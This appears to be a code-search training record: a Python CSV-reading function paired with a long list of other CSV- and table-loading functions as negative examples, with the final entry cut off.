def read_csv(filename, delimiter=','): data = [] try: with open(filename, 'r') as csvfile: reader = csv.DictReader(csvfile, delimiter=delimiter) try: keys = reader.fieldnames for row in reader: data.append(row) except csv.Error as e: sys.exit('file %s, line %d: %s' % (filename, reader.line_num, e)) except IOError as e: sys.exit('%s does not exist' % e) return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_csv():", "def loadCSV(input_file):", "def get_data(self, csv_file):\n pass", "def read_csv_file(self):\n pass", "def read_csv_as_table(csv_input_file_name, skip_first_line=False):\n output = []\n with open(csv_input_file_name, 'r') as fin:\n csv_content = csv.reader(fin, delimiter=',')\n if skip_first_line:\n next(csv_content, None)\n for row in csv_content:\n output.append(row)\n return output", "def read_csv(self, csv_input):\n # https://stackoverflow.com/a/45063514\n dtypes = {\n 'lat': 'U',\n 'long': 'U'\n }\n csv_data = pd.read_csv(csv_input, encoding='UTF-8', sep=',', na_values=[''], dtype=dtypes)\n\n self.table = csv_data.fillna('').applymap(lambda x: x.strip() if type(x) == str else x)\n self.log.info('Data read from CSV %s' % csv_input)\n #print('Data read from CSV %s' % csv_input)", "def parse(csvfilename):\n table = []\n with open(csvfilename, \"r\") as csvfile:\n for line in csvfile:\n line = line.rstrip()\n columns = line.split(',')\n table.append(columns)\n return table", "def _read_csv(self):\n self.function_name = '_read_csv'\n with open(os.path.join(self.task.downloads, self.csv_name)) as csv_file:\n reader = csv.reader(csv_file, dialect='excel')\n for row in reader:\n self.input_data.append(row)", "def read_csv_file(file_name):\n table = []\n with open(file_name) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', skipinitialspace=True)\n for row in csvreader:\n table.append(row)\n return table", "def load_data_csv():\r\n \r\n # Load lookup table\r\n path = 'data/id_lookup.csv'\r\n lookup_table = pd.read_csv(path, index_col=0)\r\n\r\n # Load song data\r\n path2 = 'data/data_lyrics_features.csv'\r\n data = pd.read_csv(path2, index_col=0)\r\n\r\n return data, lookup_table", "def read_specific_problem(filename):\r\n table = []\r\n with open(filename, newline='') as csvfile:\r\n reader = csv.reader(csvfile, skipinitialspace=True, delimiter=',')\r\n for row in reader:\r\n table.append(row)\r\n return table", "def read_table_from_csv(\n self,\n path: str,\n header: Optional[bool] = None,\n columns: Optional[List[str]] = None,\n dialect: Optional[Union[str, Dialect]] = None,\n delimiters: Optional[str] = None,\n column_unknown: str = \"Unknown\",\n encoding: Optional[str] = None,\n ) -> Table:\n sniffer = csv.Sniffer()\n with open(path, newline=\"\", encoding=encoding) as fd:\n sample = fd.readline()\n\n if dialect is None:\n dialect_name = sniffer.sniff(sample, delimiters)\n elif isinstance(dialect, Dialect):\n dialect_name = dialect.value\n else:\n dialect_name = dialect\n\n if header is None:\n header = sniffer.has_header(sample)\n\n with open(path, newline=\"\", encoding=encoding) as fd:\n if header:\n reader = csv.DictReader(\n fd, dialect=dialect_name, restkey=str(column_unknown)\n )\n else:\n reader = csv.reader(fd, dialect=dialect_name)\n rows = list(reader)\n\n table = Table(rows, columns)\n notebook_table(self.table_head(table, 10))\n\n if header and column_unknown in table.columns:\n self.logger.warning(\n \"CSV file (%s) had fields not defined in header, \"\n \"which can be the result of a wrong dialect\",\n path,\n )\n\n return table", "def parse_table_file(file):\n\n rows = [row for row in csv.reader(file.decode().splitlines(), delimiter=\",\",\n doublequote=True, escapechar=None, quotechar='\"',\n quoting=csv.QUOTE_MINIMAL, skipinitialspace=True)]\n\n if len(rows) < 2:\n raise Exception(\"File must contain at least two rows.\")\n\n # get header\n attributes = rows[0]\n\n # go through the csv by row\n data = []\n for row in rows[1:]:\n 
data.append(row)\n\n if len(attributes) < 1:\n raise Exception(\"File must contain at least one column.\")\n\n return attributes, data", "def get_table_from_file():\n with open(\"story.csv\", \"r\") as file:\n lines = file.readlines()\n table = [element.replace(\"\\n\", \"\").split(\";\") for element in lines]\n return table", "def data_from_csv(self, filepath):\n self.dataframe = pd.load_csv(filepath, separator='')", "def place_types_read_csv(self, csv_input):\n csv_data = pd.read_csv(csv_input, encoding='UTF-8', sep=',', na_values=[''])\n self.table = csv_data.fillna('').applymap(lambda x: x.strip() if type(x) == str else x)\n self.log.info('Data read from CSV %s' % csv_input)", "def handle_csv(self):\n try:\n reader = csv.reader(open(self.options.datafile, 'r'))\n except IOError:\n errormsg(_('Cannot read \"{}\"'.format(self.options.datafile)))\n raise Exception(_('Cannot read \"{}\"'.format(self.options.datafile)))\n if self.options.var_type == 'name':\n try:\n self.header = reader.next()\n except StopIteration:\n errormsg(_('Data file \"{}\" contains no data'.format(\n self.options.datafile)))\n raise Exception(_('Data file \"{}\" contains no data'.format(\n self.options.datafile)))\n self.data = []\n for row in reader:\n self.data.append(row)", "def tabular_parser(path: str, header: bool = True) -> TabularData:\n with open(path, \"r\") as read_obj:\n csv_reader = reader(read_obj)\n list_of_rows = list(csv_reader)\n rows = np.array(list_of_rows)\n\n if header:\n return TabularData(column_names=rows[0, :], data=rows[1:, :])\n else:\n return TabularData(column_names=None, data=rows[1:, :])", "def read_from_csv(self, csv_file):\n data = []\n with codecs.open(csv_file, 'r', encoding='utf-8') as csvfile:\n header = None\n for i, line in enumerate(csvfile):\n line_split = [x.strip() for x in line.split(\"|\")]\n line_data = [x for x in line_split if len(x) > 0]\n if i == 0:\n header = line_data\n else:\n entry = {}\n for i,datum in enumerate(line_data):\n entry[header[i]] = datum\n data.append(entry)\n print \"Loaded %d entries from %s\" % (len(data), csv_file)\n return data", "def load(file_name):\n with open(file_name, newline='') as f:\n reader = csv.reader(f)\n data = list(reader)\n\n schema = [x.strip() for x in data[0]]\n table = [[int(el) for el in row] for row in data[1:]]\n\n return schema, table", "def read_table(cls, filepath_or_buffer, *args, **vargs):\n if filepath_or_buffer.endswith('.csv') and 'sep' not in vargs:\n vargs['sep'] = ','\n df = pandas.read_table(filepath_or_buffer, *args, **vargs)\n labels = df.columns\n return Table([df[label].values for label in labels], labels)", "def read_csv_file(file_name):\n \n with open(file_name, newline='') as csv_file: # don't need to explicitly close the file now\n csv_table = []\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n csv_table.append(row)\n return csv_table", "def _read_tab(pth):\n if not os.path.exists(pth):\n raise SampleTableFileException(\n \"File does not exist: {}\".format(pth))\n read_csv_kwargs = {\"engine\": \"python\", \"dtype\": str,\n \"index_col\": False, \"keep_default_na\": False,\n \"na_values\": [\"\"]}\n return pd.read_csv(pth, sep=infer_delimiter(pth), **read_csv_kwargs)", "def create_table_from_file():\n\n full_path = os.getcwd()\n file_name = full_path + \"/inventory/inventory.csv\"\n\n if os.path.exists(file_name):\n table = data_manager.get_table_from_file(file_name)\n\n else:\n ui.print_error_message(\"There is no file to read!\")\n table = []\n\n return table", "def 
load_from_table(filename: str) -> List[Sample]:\n with open(filename, \"r+\", newline=\"\") as f:\n reader = csv.reader(f)\n return samples_from_iterator(reader)", "def read(tablename: str()):\n return pd.read_csv(tablename, dtype={'source_id': str})", "def populate_table_from_csv(csv_file, csv_encoding='iso-8859-15'):\n try:\n with open(file=csv_file, mode='r', encoding=csv_encoding) as input_file:\n # Could find a good place to add iterators/generators/comprehensions elsewhere, so made a new function\n # Also, yet another pylint false positive. The below line isn't supposed to be assigned to anything.\n [add_customer(*l.split(',')) for l in input_file if 'Id,Name,Last_name,' not in l] # pylint: disable=W0106\n except Exception as e:\n logger.error(\"Failed to load records from csv file %s into database %s: %s\", csv_file, customer_db.database, e)", "def readFile(self,path):\n _file = pd.read_csv(path, sep='\\s+', engine='python', header=None)\n self._dataTable = pd.DataFrame(_file.iloc[:, 3:15])\n self._dataTable.columns = ['MGEMLEEF Avg age', 'MOSHOOFD Customer main type', 'MGODRK Roman catholic',\n 'MGODPR Protestant', 'MGODOV Other religion', 'MGODGE No religion', 'MRELGE Married',\n 'MRELSA Living together', 'MRELOV Other relation', 'MFALLEEN Singles',\n 'MFGEKIND Household without children', 'MFWEKIND Household with children']", "def __obtain_data_from_csv__(self, csvfile):\n data = csvfile.readlines()\n data = self.__parse_string_for_delimiter__(data)\n return data", "def from_csv(self,path):\n self.csv_path = path\n\n try:\n fh = open(self.csv_path, \"r\")\n except IOError:\n print(\"Error: no such file or directory\") \n\n self.csv_dataframe = pd.DataFrame(pd.read_csv(self.csv_path, header=0, keep_default_na=False)).dropna(axis=0, how='any')\n test = pd.DataFrame(pd.read_csv(self.csv_path)).dropna(axis=0, how='any')\n types = [0 for i in range(len(test.dtypes))]\n a = fh.readline()\n a = a[:-1] # remove '\\n'\n x = a.split(',') # x stores the name of each column\n fh.close()\n\n #type transformation\n for i in range(len(test.dtypes)):\n if test.dtypes[i].name[0:3] == 'int' or test.dtypes[i].name[0:5] == 'float':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if not (j == 0 or (j > 1000 and j < 2100)):\n types[i] = test.dtypes[i].name[0:5]\n break\n else:\n types[i] = 'year'\n elif test.dtypes[i].name[0:6] == 'object':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if j != 0 and not(re.search(r'\\d+[/-]\\d+[/-]\\d+', j)):\n types[i] = 'varchar'\n break\n else:\n types[i] = 'date'\n \n name = path.rsplit('/', 1)[-1][:-4]\n self.table_info(name, x, types)\n self.import_method = methods_of_import[2] # = 'csv'\n\n self.show_csv_info()", "def csv_delimiter_examples():\n number_table = read_csv_file(\"number_table.csv\", \" \")\n print_table(number_table)\n print()\n name_table = read_csv_file(\"name_table.csv\", \",\")\n print_table(name_table)", "def csv_delimiter_examples():\n number_table = read_csv_file(\"number_table.csv\", \" \")\n print_table(number_table)\n print()\n name_table = read_csv_file(\"name_table.csv\", \",\")\n print_table(name_table)", "def readRecordFromFile():\n\twith open(gbl.sourceFile, newline='') as csvfile:\n\t\trowReader = csv.reader(csvfile, delimiter=gbl.csvDiscriminator, quotechar=gbl.csvQuotechar)\n\t\tfor row in rowReader:\n\t\t\tROWData.append(row)", "def load_main_table(table_text):\n\n lines = 
table_text.split('\\n')\n i = 1\n cols = []\n for thing in lines[1].split('\",\"'):\n if thing in ['C ', 'I ', 'K ', 'E ', 'H ']:\n cols.append(thing.strip() + str(i) + ' ')\n if thing == 'H ':\n i += 1\n else:\n cols.append(thing)\n lines[1] = '\",\"'.join(cols)\n text = \"\\n\".join(lines[1:])\n df = pd.read_csv(StringIO(text))\n df.index = df['Student ID']\n\n return df", "def read_from_csv(file):\n with open(file) as f:\n next(f)\n data = []\n for line in csv.reader(f, delimiter='\\t'):\n data.append(list(line))\n return data", "def read_data_from_csv(csv_file, header=None, **kwargs):\n if os.path.isabs(csv_file) == False:\n path_to_csv = os.path.join(csv_file)\n else:\n path_to_csv = csv_file\n row_list = []\n if \"field_sep\" not in kwargs.keys():\n field_sep = ','\n else:\n field_sep = kwargs.get(\"field_sep\")\n with open(path_to_csv, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=field_sep, fieldnames=header)\n for record in csv_reader:\n if list(record.values())[0].startswith(\"#\") is not True:\n # IT'S A COMMENT IF IT STARTS WITH \"#\" \n # IF THIS IS YOUR HEADER ROW, SUPPLY A LIST OF COLUMN NAMES WHEN CALLING THE FUNCTION\n row_list.append(record)\n return row_list", "def import_files_table(path):\n return pd.read_csv(path, sep=\"\\t\", skiprows=1, header=0)", "def _read_csv(input_file):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f)\n lines = []\n for line in reader:\n lines.append(line)\n return lines[1:] # remove header", "def _load_csv(root_path, table_meta):\n relative_path = os.path.join(root_path, table_meta['path'])\n dtypes = _read_csv_dtypes(table_meta)\n\n data = pd.read_csv(relative_path, dtype=dtypes)\n data = _parse_dtypes(data, table_meta)\n\n return data", "def load_data(filename='KSI.csv'):\r\n d = []\r\n with open(filename) as csv_file:\r\n # csv_reader = csv.reader(csv_file, delimiter=',')\r\n csv_reader = csv.DictReader(csv_file, delimiter=',')\r\n for line_count, row in enumerate(csv_reader):\r\n if line_count == 0:\r\n print(f'Column names are \\n{\", \".join(row)}')\r\n # column_names = row\r\n else:\r\n d.append(row)\r\n # print(f'Processed {line_count} lines.')\r\n return d", "def read_csv(self):\n with open(self.csv_file, 'rU') as file_object:\n reader = csv.reader(file_object, delimiter=self.delimiter)\n if self.has_header_row:\n header_row = next(reader, None)\n if self.has_duplicate_column_names:\n header_counts_dict = dict()\n new_header_row = []\n for each_header in header_row:\n try:\n header_counts_dict[each_header] += 1\n except KeyError:\n header_counts_dict[each_header] = 1\n frequency = header_counts_dict[each_header]\n if frequency==1:\n new_header_row.append(each_header)\n else:\n new_header_row.append(each_header+str(frequency))\n header_row = new_header_row\n else:\n header_row = self.provided_headers_list\n rows = [\n { header: value for header, value in zip(header_row, next_row)}\n for next_row in reader\n ]\n return header_row, rows", "def from_csv(self, path):\n for model, table in [(self.Dataset, 'dataset'),\n (self.Datarun, 'datarun'),\n (self.Hyperpartition, 'hyperpartition'),\n (self.Classifier, 'classifier')]:\n df = pd.read_csv(os.path.join(path, '%ss.csv' % table))\n\n # parse datetime columns. 
This is necessary because SQLAlchemy can't\n # interpret strings as datetimes on its own.\n # yes, this is the easiest way to do it\n for c in inspect(model).attrs:\n if type(c) != ColumnProperty:\n continue\n col = c.columns[0]\n if type(col.type) == DateTime:\n df[c.key] = pd.to_datetime(df[c.key],\n infer_datetime_format=True)\n\n for _, r in df.iterrows():\n # replace NaN and NaT with None\n for k, v in list(r.iteritems()):\n if pd.isnull(v):\n r[k] = None\n\n # insert the row into the database\n create_func = getattr(self, 'create_%s' % table)\n create_func(**r)", "def import_data(csv_file):\n # skips bad lines\n data = pd.read_csv(csv_file, error_bad_lines=False)\n return data", "def import_dataset(fpath):\r\n data = read_csv(fpath)\r\n print(data.head())\r\n print(data.shape)\r\n return data", "def read_csv(\n type: CSVTypes,\n csv_file: UploadFile = File(...),\n db: Session = Depends(get_db),\n authorization: str = Header(None),\n settings: config.Settings = Depends(get_settings),\n):\n if authorization != settings.upload_secret:\n raise HTTPException(401, \"Operação inválida!\")\n\n lines = 0\n\n with csv_file.file as file:\n content = file.read()\n content = content.decode(\"utf-8\")\n content = content.split(\"\\n\")\n if type == CSVTypes.results:\n lines = len(import_results_csv(content, db))\n elif type == CSVTypes.templates_results:\n lines = len(import_templates_results_csv(content, db))\n elif type == CSVTypes.hospitals:\n lines = len(import_hospitals_csv(content, db))\n else:\n raise HTTPException(400)\n\n log(\"[CSV] CSV foi importado.\", db)\n\n return {\"lines\": lines}", "def import_rows(self, csv_file, table_id=None):\n if table_id:\n self.table_id = table_id\n\n params = {'startLine': 1, # skip cols?\n 'encoding': \"UTF-8\",\n 'delimiter': \",\",\n 'isStrict': True}\n\n media = MediaFileUpload(csv_file, mimetype='text/csv', resumable=True)\n self.request = self._table().importRows(tableId=self.table_id, media_body=media, **params)\n self._process_request(name='import_rows', resumable=True)\n \n # URL for new look \n logger.info(\"The fusion table is located at: {}\".format(\n self.build_uri('/view')))\n return True", "def read_csv_file(file_name, file_delimeter):\n \n with open(file_name, newline='') as csv_file: # don't need to explicitly close the file now\n csv_table = []\n csv_reader = csv.reader(csv_file, delimiter=file_delimeter)\n for row in csv_reader:\n csv_table.append(row)\n return csv_table", "def read_csv_file(file_name, file_delimeter):\n \n with open(file_name, newline='') as csv_file: # don't need to explicitly close the file now\n csv_table = []\n csv_reader = csv.reader(csv_file, delimiter=file_delimeter)\n for row in csv_reader:\n csv_table.append(row)\n return csv_table", "def load(self, path, separator=\",\", decoder=lambda j,v: v):\n # Date objects are saved and loaded as strings, but it is easy to convert these back to dates:\n # Table.columns[x].map(lambda s: date(s))\n data = open(path, \"rb\").read().lstrip(BOM_UTF8)\n data = StringIO(data)\n data = [row for row in csv.reader(data, delimiter=separator)]\n data = [[_eval(decoder(j,v)) for j,v in enumerate(row)] for row in data]\n return Table(data)", "def csv(self, file, table=None):\n\n if table:\n table.import_from_csv_file(file)\n else:\n db = self.db\n # This is the preferred method as it updates reference fields\n db.import_from_csv_file(file)\n db.commit()", "def read(self):\r\n\r\n self.data = []\r\n\r\n with open(self.filename + \".csv\", mode='r') as csv_file:\r\n reader = 
csv.DictReader(csv_file)\r\n for row in reader:\r\n self.data.append(row)", "def load_raw_table(conf, table):\n confrd = load_config_raw_data(conf)\n path_table = Path(confrd[table][\"path\"])\n sep = confrd[table][\"sep\"]\n encoding = confrd[table][\"encoding\"]\n df = pd.read_csv(path_table, sep=sep, encoding=encoding)\n return df", "def import_data(address):\n try:\n inputcsv = csv.reader(open(address, \"r\"), delimiter=\";\", lineterminator=\"\\n\")\n except IOError:\n print \"File not exists or is unreadable, please check it.\"\n exit(1)\n\n data = list() # all data\n item = list() # each tabular\n count = 0\n subcount = 0\n try:\n for row in inputcsv:\n if count < 2 : # read Time period and number of product\n data.append(int(row[1]))\n else :\n item.append(row[1:])\n subcount +=1 \n if subcount == data[1]:\n data.append(np.array(item, dtype=float))\n item = list()\n subcount = 0\n count += 1\n if (data[1] > 1):\n data.append(np.array(item, dtype=float)) # manage the last tabular\n except:\n print \"File is not well formated, please correct it.\"\n exit(1)\n return data", "def process_loading_file(self):\n column_headers = []\n column_headers_all = []\n\n # Open the file once to get idea of the total rowcount to display progress\n with open(self.csv_file_path[0], newline='') as csv_file:\n self.progress_max.emit(len(csv_file.readlines()) - 2)\n\n with open(self.csv_file_path[0], newline='') as csv_file:\n\n self.csv_data_table.setRowCount(0)\n self.csv_data_table.setColumnCount(0)\n\n csv_file_read = csv.reader(csv_file, delimiter=',', quotechar='|')\n\n # Fetch the column headers and move the iterator to actual data\n column_headers = next(csv_file_read)\n\n # Reflect back the changes in the reference to the column headers\n for header in column_headers:\n self.column_headers.append(header)\n # A backup to keep a list of all the headers to toogle their view later\n self.column_headers_all.append(header)\n\n # TODO: Increase the reading speed by decreasing load on actual table population\n\n # self.csv_data_table.hide()\n\n for row_data in csv_file_read:\n\n self.relay.emit(self.csv_data_table.rowCount())\n # self.relay.emit(self.x)\n # self.x = self.x + 1\n row = self.csv_data_table.rowCount()\n self.csv_data_table.insertRow(row)\n self.csv_data_table.setColumnCount(len(row_data))\n for column, stuff in enumerate(row_data):\n item = QTableWidgetItem(stuff)\n self.csv_data_table.setItem(row, column, item)\n\n self.csv_data_table.setHorizontalHeaderLabels(self.column_headers)\n\n # Set WordWrap to True to make the cells change height according to content\n # Currently set it to false as it looks very decent and makes cell size uniform throughout\n self.csv_data_table.setWordWrap(False)\n # Uncomment below line to stretch to fill the column width according to content\n # self.csv_data_table.resizeColumnsToContents()\n self.csv_data_table.resizeRowsToContents()\n\n # Update the bottom toolbar to reflect changes\n self.update_bottom_toolbar.emit()\n self.finished.emit()", "def read_csv(self, path):\n for file in os.listdir(path):\n if file[-4:] == \".csv\":\n name = file[:-4]\n table_index_header = cfg.get_list(\"table_index_header\", name)\n filename = os.path.join(path, file)\n self.input_data[name] = pd.read_csv(\n filename,\n index_col=list(range(int(table_index_header[0]))),\n header=list(range(int(table_index_header[1]))),\n squeeze=(\"series\" not in name),\n )\n self.check_input_data(warning=False)\n self.add_meta_data()\n return self", "def load_file(self):\n\n self.df = 
self.sqlContext.read.csv(self.source, sep=self.sep, header=True, inferSchema=True)", "def read_csv(csv_file):\r\n with open(csv_file, \"r\") as files:\r\n data = csv.reader(files)\r\n return list(data)", "def read_csv_data(csv_path):\n\n return pd.read_csv(csv_path, sep=',', engine='python')", "def read_data(self):\n fpath = './data/surveys.csv'\n self.data = pd.read_csv(fpath, header=0, low_memory=False)\n #print(self.data.head(n=5))\n print(self.data.shape)", "def read_csv(self, file: str, table: str, libref: str =\"\", nosub: bool =False, opts: dict = None) -> '<SASdata object>':\n opts = opts if opts is not None else {}\n\n code = \"filename x \"\n\n if file.lower().startswith(\"http\"):\n code += \"url \"\n\n code += \"\\\"\"+file+\"\\\";\\n\"\n code += \"proc import datafile=x out=\"\n if len(libref):\n code += libref+\".\"\n code += \"'\"+table.strip()+\"'n dbms=csv replace; \"+self._sb._impopts(opts)+\" run;\"\n\n if nosub:\n print(code)\n else:\n ll = self.submit(code, \"text\")", "def read_rf_csv():\n if os.path.exists(\"rf.csv\"):\n #print (\"--decision trees CSV imported\\n\")\n results = pd.read_csv(\"rf.csv\", index_col=0)\n else:\n print(\"log not found\")\n\n return results", "def read_csv_ur10(self, csv_file):\r\n df = pd.read_csv(csv_file, sep=';', decimal=',', header=0)\r\n return df", "def read_data():\n data = pd.read_csv('input_data/Preply_tutor_views_datasaet.csv')\n return data", "def load_tweets(fp):\r\n ans = pd.read_csv(fp, sep='\\t')\r\n return ans", "def readFile(filename):\n\twith open(filename, 'rU') as csvIN:\n\t\tnext(csvIN)\n\t\toutCSV=(line for line in csv.reader(csvIN, dialect='excel'))\n\t\tfor row in outCSV:\n e = Entry(row)\n e.pass_import()", "def test_misc_csv_read():\n r = csv_reader(\"../test/test.csv\")\n fields = r.hdr()\n data = str(fields)\n while True:\n row = r.row()\n if not row: break\n data += '\\n' + str(row)\n\n assert(data == \"\"\"\n['EVT_CODE*', 'EVT_DATE.DE', 'CODE', 'AGE', 'FRST', 'LST', 'SPEC', 'de.id']\n['tea', '2018/01/01', 'X', '35', 'PRE', 'WHO', 'BUG', '1']\n['coffee', '2018/05/05', 'X', '35', 'JAN,Z', 'WHO', 'FRG', '1']\n['water', '2018/01/01', 'Y', '35', 'TAN', 'POST', 'CAT', '2']\n \"\"\".strip())", "def load_data_from_csv(csv_file, users_to_i = {}, items_to_i = {}):\n raw_data = []\n with open(csv_file) as f:\n csvreader = csv.reader(f)\n # skipping first row (header)\n next(csvreader)\n for user, item in csvreader:\n raw_data.append((user, item))\n return load_data_from_array(raw_data, users_to_i, items_to_i)", "def loadData(path_file):\n data = pd.read_csv(path_file) \n data.head()\n return data", "def load_data_from_csv(csv_file):\n list=[]\n\n with open(csv_file) as csv_1:\n csv_out = csv.reader(csv_1) \n next(csv_out)\n for rows in csv_out: \n if len(rows) != 0:\n list.append([rows[0],int(rows[1]),int(rows[2])])\n \n return (list)", "def readcsv(path, delimiter= ','):\n my_data = genfromtxt(path, delimiter= delimiter)\n return my_data", "def load_data(csv_path):\n df = pd.read_csv(csv_path)\n return df", "def loadtable(header, rows, thousands=True):\n formatted = load_csv(header, rows, sep=\" \", thousands=thousands)\n header, rows = formatted[0], formatted[1:]\n\n return banner(header, rows)", "def dataLoad():\n try:\n try: #Python3\n f = open(__file__ + \".csv\",\"rt\")\n except: #Python2\n f = open(__file__ + \".csv\",\"rb\")\n data = f.read().split(',')\n entryCol.entry0.delete(0,END)\n entryCol.entry0.insert(0,data[0])\n entryCol.entry1.delete(0,END)\n entryCol.entry1.insert(0,data[1])\n 
entryCol.entry2.delete(0,END)\n entryCol.entry2.insert(0,data[2])\n entryCol.entry3.delete(0,END)\n entryCol.entry3.insert(0,data[3])\n botWind.writeN(\"DataLoad: File\")\n except:\n botWind.writeN(\"DataLoad: Default\")", "def read_data(path, filename, drop_col=\"index\", dt=\"float32\"):\n\tdata = pd.read_csv(path + filename, sep=\",\", dtype=dt)\n\tdata = data.drop(drop_col, axis=1)\n\treturn data.as_matrix()", "def read_csv(csv_file_path):\n res = [] #list\n # f = open(csv_file_path) #read file\n with open(csv_file_path,\"r\") as f:", "def read(self):\n with open(self.filename) as f:\n reader=csv.reader(f)\n for row in reader:\n self.data.appendleft(row)", "def load_csv(filename):\n # Open csvfile\n with open(filename) as csvfile:\n reader = csv.DictReader(csvfile)\n\n # Put data in gloabal list\n for row in reader:\n # Get data of subject with either or both milk and peanut allergy\n if row[\"MILK_ALG_START\"] != \"NA\" or row[\"PEANUT_ALG_START\"] != \"NA\":\n sub_list = list()\n for key in DATA_KEYS:\n sub_list.append(row[key])\n\n # Add data of subject to all data \n data_list.append(sub_list)", "def _read_csv(self):\n with open(self._file_path, 'rb') as f:\n reader = csv.DictReader(f, delimiter=',')\n self._content = [row for row in reader]", "def test_csvfile_single_row_of_data(fs: FakeFilesystem) -> None:\n contents = \"\"\"\"a\",\"b\"\n1,2\"\"\"\n fs.create_file(\"test.csv\", contents=contents)\n\n adapter = CSVFile(\"test.csv\")\n\n assert adapter.get_columns() == {\n \"a\": Float(\n filters=[Range, Equal, NotEqual, IsNull, IsNotNull],\n order=Order.NONE,\n exact=True,\n ),\n \"b\": Float(\n filters=[Range, Equal, NotEqual, IsNull, IsNotNull],\n order=Order.NONE,\n exact=True,\n ),\n }\n assert list(adapter.get_data({}, [])) == [{\"a\": 1.0, \"b\": 2.0, \"rowid\": 0}]", "def read(self, filename):\n lines = []\n rawData = []\n file = open(filename, \"rU\")\n csv_reader = csv.reader( file )\n for line in csv_reader:\n lines.append(line)\n for item in range(len(line)):\n line[item] = line[item].replace(\" \",\"\")\n self.headers = lines[0]\n self.types = lines[1]\n rawData = lines[2:]\n for row in rawData:\n newRow = []\n for i in range(len(row)):\n if self.types[i] != 'numeric':\n continue\n else:\n newRow.append(float((row[i].strip())))\n self.finalData.append(newRow)\n self.data = np.matrix(self.finalData)\n\n for i in range(len(self.types)):\n if self.types[i] == 'numeric':\n self.numHeadList.append(self.headers[i])\n i = 0\n for header in self.numHeadList:\n self.header2col[header] = i\n i += 1\n\n return self.data", "def read_csv_data(url):\n\n csv_data = pd.read_csv(url)\n\n return csv_data", "def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def read_csv(self, inputfile):\n d = csv.reader(inputfile)\n for row in d.read():\n self.translations[row[0]] = row[1]", "def load_data(filepath):\n with open(filepath) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n yield row", "def read_csv(self, csv_file):\n mylog.debug('Reading csv file %s for data' % csv_file)\n csv_data = pandas.read_csv(csv_file)\n mylog.debug('Read of csv file complete.')\n #mylog.debug('%s' % csv_data)\n #sometimes the csv has an empty dataframe #\n if csv_data.empty:\n mylog.debug('Data frame is empty; repopuating data')\n csv_info = []\n for item in csv_data:\n #add the data one cell at a time to the list 
#\n #for some reason, some csvs have the data #\n #with random decimal points #\n csv_info.append(item.split(\".\")[0])\n df = pandas.DataFrame(columns=csv_info)\n df.loc[0]=csv_info\n #write the data from the list back into the cells#\n #one at a time #\n for column in range(0, len(csv_info)): \n df.iloc[0,column] = csv_info[column]\n csv_data = df \n return csv_data", "def load_from_csv(path, delimiter=','):\n return pd.read_csv(path,encoding = \"ISO-8859-1\",dtype=object)", "def ReadFromCSV(cls, year, grant_data, converter, calendar):\n\n def CheckExpectedTables(data, expected):\n if sorted(data.keys()) != sorted(expected):\n raise ValueError(\"Unexpected tables.\\n Expected: %s\\n Found: %s\" % (\n sorted(data.keys()), expected))\n\n def CreateStockTable(name, headings):\n return StockTable(name, year, headings, converter, calendar, grant_data)\n\n try:\n statements = cls.STATEMENT_FILES[year]\n except KeyError:\n raise NotImplementedError(\n \"Don't know what files to use for tax year %d\" % year)\n\n filenames = statements.values()\n if len(filenames) == 1:\n data = csvtable.ReadMultitableCSV(filenames[0], CreateStockTable)\n else:\n tablenames, filenames = statements.keys(), filenames\n constructors = [CreateStockTable] * len(statements)\n data = csvtable.ReadCSVTables(tablenames, filenames, constructors)\n CheckExpectedTables(grant_data, data.keys())\n\n return data", "def _csv_engine(filename, node):\n sep = node.get(\"sep\", \",\")\n header = node.get(\"header\", 0)\n logger.debug(\n \"Parsing CSV '{}'. sep={}, header={}.\".format(filename, sep, header)\n )\n index = node.get(\"index\")\n encoding = node.get(\"encoding\")\n if not index:\n raise InvalidConfig(\"An 'index' column is required. It should \"\n \"be the sample id column.\")\n\n df = pd.read_csv(filename, sep=sep, header=header, encoding=encoding)\n df.set_index(index, verify_integrity=True, inplace=True, drop=True)\n df.index = df.index.astype(str)\n\n return df", "def load_csv_model(filename) -> tuple:\n dat_sci = pd.read_csv(resources_folder(filename), index_col=0)\n commenter('data from ' + filename, lambda: print(dat_sci))\n\n ind = dat_sci.index\n # commenter('index', lambda: print(ind))\n col = dat_sci.columns\n # commenter('columns', lambda: print(col))\n # self.data = np.asmatrix(dat_sci.values)\n # commenter('data', lambda: print(self.data))\n # print(type(dat_sci))\n\n return dat_sci, ind, col", "def get_data_from_robot():\n file = ''\n if file:\n reader = csv.DictReader(open(file))\n data = []\n for row in reader:\n data.append([row])\n return data", "def read_table(filename, separator=',', dtype='float'):\n\n fp = open(filename, 'r')\n\n headers = fp.readline()\n\n # print \"headers = \", headers\n headers = [h.strip() for h in headers.split(separator)]\n headers.remove('')\n\n #print \"headers = \", headers\n\n columns = [[] for h in headers]\n #table = dict.fromkeys(headers, [])\n\n #table = Container.fromkeys(headers, [])\n\n #print \"table = \", table\n\n for line in fp.readlines():\n\n values = [h.strip() for h in line.split(separator)]\n values.remove('')\n\n #print \"values = \", values\n\n for k, v in enumerate(values):\n\n #print k, \" = \", v\n\n\n if dtype == \"float\":\n v = float(v)\n\n columns[k].append(v)\n #table[k].append(v)\n\n table = Container(**dict(list(zip(headers, columns))))\n table.headers = headers\n\n return table", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def ReadFromCSV(filename):\n\n 
